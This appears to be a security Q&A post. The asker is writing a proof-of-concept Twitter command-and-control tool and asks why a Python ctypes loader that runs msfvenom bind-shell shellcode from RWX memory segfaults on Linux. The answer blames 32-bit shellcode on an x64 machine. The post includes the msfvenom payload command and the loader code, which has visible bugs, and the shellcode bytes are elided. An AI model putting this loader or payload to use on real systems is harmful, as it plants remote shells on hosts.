# Python - ctypes.cast function call outputs Segmentation Fault error message

Tags: python, c, shellcode, cross-platform

**Background:**

Writing a proof of concept of a twitter C&C inspired by Prof Viviek of SPSE similiar to  [twittor](https://github.com/PaulSec/twittor/) and the project includes a functionality of injecting shellcode and executing it within the python's program. However I wanted to make the functionality cross platforms, but it only worked in a windows system.

**Problem**: When executing the python script in ubuntu server 12.04.5 LTS, the output says

```
Segmentation fault (core dumped)
```

Which means I am getting denied for accessing memory that I don't have permission for. This is strange b/c in the source code I also set  cytpes.mprotect(allocated_space, space_size, 7) <== 4 + 2 + 1 is for wrx permissions

**Shellcode generated using command:**

```
msfvenom --payload linux/x86/shell/bind_tcp  --format py --arch x86 --bad-char "\x00\x20\x0d"
```

**Python Script**:

```
 #!/usr/bin/env python

import ctypes
import os

# please comment out the appropriate payload for the other platforms
# this below is for windows shell bind tcp listening at 4444
#buf  = ""
#buf += "shellcode..."

# below is for linux
buf = ""
buf += "shellcode..."


def main(shellcode):
    if os.name == 'posix':                                                 
        try:                              
            libc = ctypes.CDLL('libc.so.6')                                
            sc_ptr = ctypes.c_char_p(shellcode)                               

            size = len(shellcode)                                          
            addr_freespace = ctypes.c_void_p(libc.valloc(size))                 
            ctypes.memmove(addr_freespace, sc_ptr, size)                            
            libc.mprotect(addr_free_space, size, 1 | 2 | 4)   # changed to 7 for all three access                    
            run = ctypes.cast(free_space, ctypes.CFUNCTYPE(ctypes.c_void_p))
            run()                                                           
            sys.exit()                                                                    
        except Exception as e:
            print "Error: " e

    else:                                                                   
        try:  # windows implementation



if __name__ == '__main__':
    main(buf)
```

**Question:**  Can someone explain why does the segmentation fault message appear and how do we fix such problem?

**Credits**: this script is inspired by [sickle.py @ Line743-753](https://github.com/wetw0rk/Sickle/blob/master/sickle.py)

The only difference is the reference script is using python 3, while I am using python 2.7.

**UPDATE**:

After many trials and errors, including running the program in pdb. The segmentation fault error happened after the line of:

```
run()
```

*Can someone please explain why this is happening?*

Comment: Is this not more of a programming question? I'd say this would fit better on StackOverflow than it does here. What you're asking is why you're getting a fault when running the program. Seems to me that this is would fit better on SO than here. Whilst your topic fits security (as in what the script is trying to do) the problem does *not*

Comment: Yeah @Joshua I have been contemplating whether or not this question belongs here to SO. I have now migrated this question to SO instead, and will delete this question when the bounty ends.

Answer (score 1, accepted):

The VM machine was x64 architecture, and I fed it 32 bit shellcode, terrible mistake on my part, but finally mystery solved.